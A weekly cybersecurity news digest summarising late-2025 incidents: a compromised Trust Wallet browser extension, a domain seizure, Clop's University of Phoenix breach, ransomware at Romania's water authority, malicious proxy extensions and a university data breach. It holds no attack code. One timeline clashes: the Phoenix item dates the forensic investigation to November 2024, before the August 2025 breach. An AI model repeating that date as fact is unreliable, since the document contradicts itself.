SecureFact – Cyber Security News – Week of December 29, 2025

Trust Wallet confirmed that a compromised Chrome extension update released on December 24 led to $7 million in stolen cryptocurrency from users’ wallets.
The malicious version 2.68.0 contained suspicious code that exfiltrated sensitive wallet data to an external server hosted at metrics-trustwallet.com.
Security researchers identified that the compromised extension was sending wallet seed phrases and private keys to attackers’ servers.
Binance founder CZ confirmed the company will cover the $7 million in losses and stated “User funds are SAFU.”
The attack affected users who installed the compromised extension update and interacted with their wallets afterward.
Trust Wallet quickly released version 2.69 to fix the security issue and advised users to update immediately.
Simultaneously, threat actors launched phishing domains promising bogus “vulnerability” fixes to steal additional funds.
The incident highlights the risks of browser-based cryptocurrency wallets and the importance of supply chain security.

The U.S. government seized the ‘web3adspanels.org’ domain and associated database used by cybercriminals to host bank login credentials stolen in account takeover attacks.
The confirmed financial loss from this criminal activity is estimated at $14.6 million, with attempted losses reaching approximately $28 million.
At least 19 victims throughout the United States have been identified, including two companies in the Northern District of Georgia.
Cybercriminals collected the credentials through phishing campaigns targeting American citizens via fraudulent ads on Google and Bing search services.
The seized domain hosted a backend server containing stolen login credentials of thousands of victims that was active as recently as November.
The seizure was carried out with assistance from Estonian law enforcement and other international partners.
Since January, the FBI’s Internet Crime Complaint Center has received over 5,100 complaints related to bank account takeovers with losses exceeding $262 million.
Authorities recommend users bookmark official banking portals instead of searching on Google or Bing to avoid malicious ads.

The Clop ransomware gang stole data from nearly 3.5 million University of Phoenix students, staff, and suppliers after breaching the university’s network in August.
Attackers exploited a zero-day vulnerability in the Oracle E-Business Suite (EBS) financial application to steal sensitive personal and financial information.
The compromised data includes names, contact information, dates of birth, social security numbers, and bank account and routing numbers.
University of Phoenix detected the breach on November 21 after Clop added it to their data leak site, but the actual breach occurred months earlier.
The forensic investigation was completed on November 5, 2024, revealing the full scope of 3,489,274 affected individuals.
UoPX now offers free identity protection services including $1 million fraud reimbursement policy and 12 months of credit monitoring.
This attack is part of a broader Clop extortion campaign targeting Oracle EBS platforms since early August 2025.
Other U.S. universities including Harvard and University of Pennsylvania were also targeted in the same campaign.

Romanian Waters, the country’s water management authority, was hit by a ransomware attack that impacted approximately 1,000 computer systems.
The incident affected 10 of the authority’s 11 regional offices, compromising servers running geographic information systems, databases, email, and web services.
Attackers used the built-in Windows BitLocker security feature to encrypt files on compromised systems and left a ransom note demanding contact within 7 days.
While IT systems were severely impacted, operations and operational technology (OT) systems controlling water infrastructure remained unaffected and secure.
Water management operations continue normally using voice communication channels, with hydrotechnical facilities operated locally by on-site personnel.
Romanian cybersecurity agencies are investigating the incident and working to integrate the water authority into protective systems operated by the National Cyberint Center.
The attack vector has not yet been identified, and no ransomware operation has claimed responsibility for the attack.
This incident follows similar attacks on critical infrastructure, with Danish intelligence recently blaming Russia for water utility cyberattacks.

Two Chrome extensions named ‘Phantom Shuttle’ in the Web Store are posing as proxy service plugins to hijack user traffic and steal sensitive data.
Both extensions have been active since at least 2017 and route all user web traffic through proxies controlled by threat actors using hardcoded credentials.
The malicious extensions can intercept HTTP authentication challenges on every website and capture data from any form including credentials, card details, and passwords.
In “smarty” mode, the extensions route over 170 high-value domains through the proxy network, including developer platforms, cloud services, and social media sites.
The extensions dynamically reconfigure Chrome’s proxy settings using auto-configuration scripts to automatically route traffic through attacker-controlled proxies.
While acting as man-in-the-middle, the extensions steal session cookies from HTTP headers and extract API tokens from requests.
The target audience is users in China, including foreign trade workers who need to test connectivity from various locations.
Both extensions are still present in Chrome’s official marketplace at the time of reporting, available for subscription between $1.4 – $13.6.

Baker University disclosed a 2024 data breach impacting 53,624 individuals, as detailed in a filing with the Maine Attorney General.
Attackers accessed the university’s systems from December 2 to 19, 2024, following a network outage, and stole sensitive documents containing varied personal information for those affiliated with the school.
The types of data affected included names, dates of birth, driver’s license numbers, financial account information, health insurance information, medical information, passport information, Social Security numbers, student identification numbers, and tax identification numbers.
In response, the university engaged an external cybersecurity firm to investigate alongside its internal team and rebuilt a primary compromised platform.
It is now providing free credit monitoring services to affected individuals and recommending they regularly monitor account statements and credit reports for any suspicious activity, while stating no evidence of fraudulent use has been found